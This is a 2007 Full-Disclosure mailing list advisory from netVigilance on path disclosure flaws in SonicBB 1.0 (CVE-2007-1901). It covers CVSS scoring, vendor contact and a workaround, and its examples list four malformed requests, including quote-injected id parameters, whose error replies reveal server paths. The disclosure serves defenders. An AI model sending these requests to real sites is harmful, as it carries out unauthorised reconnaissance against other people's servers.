[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] SonicBB version 1.0 Multiple Path Disclosure
From: "SecurityResearch" <securityresearch () netvigilance ! com>
Date: 2007-05-14 12:30:58
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A51F () beaverton ! portland ! local
[Download RAW message or body]
netVigilance Security Advisory #18
SonicBB version 1.0 Multiple Path Disclosure Vulnerabilities
Description:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is \
compatible with any web server/operating system combo with PHP 4.x or higher \
installed.SonicBB is the ideal community software for all sites. This vulnerabilities \
can be exploited only when PHP magic_quotes_gpc = Off. External References:
Mitre CVE: CVE-2007-1901
NVD NIST: CVE-2007-1901
OSVDB: 33906
Summary:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is \
compatible with any web server/operating system combo with PHP 4.x or higher \
installed. SonicBB is the ideal community software for all sites. Security problems \
in the product allow attackers to gather the true path of the server-side script. \
Advisory URL: http://www.netvigilance.com/advisory0018
Release Date:
05/14/2007
Severity:
Risk: Low
CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Bias: Normal
CVSS Base Score: 1.86
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
Vulnerability Impact: Attack
Host Impact: Path disclosure.
SecureScout Testcase ID:
TC 17946
Vulnerable Systems:
SonicBB version 1.0
Vulnerability Type:
Program flaw - The search.php, viewforum.php and members.php scripts has flaws which \
lead to a Warning or even Fatal Errors. Vendor:
iScripts
Vendor Status:
Contact with the Vendor was established and draft of the security advisory was \
provided on 10 April 2007, the vendor promised to fix the issue but stopped \
responding to our emails on 10 April 2007. There is no official fix at the release \
of this Security Advisory Workaround:
To prevent path disclosure attacks following steps should be done:
Disable warning messages: modify in the php.ini file following line: display_errors = \
Off. Or modify .htaccess file (this will work only for the apache \
servers).
Example:
Path Disclosure Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/search.php?query=1&part=post&
order=title&by[]=desc
REPLY:
<b>Warning</b>: mysql_num_rows(): supplied argument is not a valid MySQL result \
resource in <b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\search.php</b> on line \
<b>27</b><br />
...
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result \
resource in <b>[DISCLOSUR PATH]\[PRODUCT-DIRECTORY]\search.php</b> on line \
<b>36</b><br /><tr> Path Disclosure Vulnerability 2:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/viewforum.php?p[]=1
REPLY:
<b>Fatal error</b>: Unsupported operand types in <b>[DISCLOSED \
PATH]\[PRODUCT-DIRECTORY]\viewforum.php</b> on line <b>6</b><br /> Path Disclosure \
Vulnerability 3: REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/viewforum.php?id=';
REPLY:
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result \
resource in <b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\viewforum.php </b> on line \
<b>12</b><br />
...
<b>Warning</b>: Cannot modify header information - headers already sent by (output \
started at [DISCLOSED PATH]\[PRODUCT-DIRECTORY]\viewforum.php:12) in <b>[DISCLOSED \
PATH]\[PRODUCT-DIRECTORY]\viewforum.php</b> on line <b>16</b><br />
...
<b>Warning</b>: mysql_num_rows(): supplied argument is not a valid MySQL result \
resource in <b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\viewforum.php </b> on line \
<b>27</b><br />
...
<b>Warning</b>: mysql_num_rows(): supplied argument is not a valid MySQL result \
resource in <b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\viewforum.php </b> on line \
<b>32</b><br /><br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not \
a valid MySQL result resource in <b>[DISCLOSED \
PATH]\[PRODUCT-DIRECTORY]\viewforum.php </b> on line <b>46</b><br /><tr> Path \
Disclosure Vulnerability 4: REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/members.php?id=';
REPLY:
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result \
resource in <b>[DISCLOSED PATH]\[PRODUCT-DIRECTORY]\members.php </b> on line \
<b>8</b><br />
...
<b>Warning</b>: Cannot modify header information - headers already sent by (output \
started at [DISCLOSED PATH]\[PRODUCT-DIRECTORY]\members.php:8) in <b>[DISCLOSED \
PATH]\[PRODUCT-DIRECTORY]\members.php</b> on line b>10</b><br/>
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.c
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic